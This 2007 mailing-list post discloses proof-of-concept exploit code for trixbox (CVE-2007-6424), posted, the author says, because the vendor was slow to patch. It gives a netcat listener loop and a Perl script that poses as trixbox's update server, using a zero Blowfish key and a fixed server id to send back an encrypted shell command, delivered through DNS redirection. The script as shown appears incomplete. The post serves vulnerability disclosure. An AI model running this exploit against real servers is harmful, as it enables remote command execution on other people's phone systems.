[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code
thanrantaro at live.com
Tue Dec 18 22:25:46 EST 2007
Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE
and write some exploit code. I feel that 72+ hours is more than enough
time to fix something this simple. They also do not appear to have any
intentions of posting an advisory.
Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.
trixbox:~$ cat trixbox-exploit.pl
use Crypt::CBC;

# Blowfish in CBC mode, keyed with the string of 32 zeros
my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );
my $req = <STDIN>;   # first line of the incoming request
my $hax;
if( $req =~ /ce00000000000000000000000000000000/ ) {
    $hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );
} elsif( $req =~ /generate_id/ ) {
    $hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";
} else {
    $hax = "ERROR: invalid server id";
}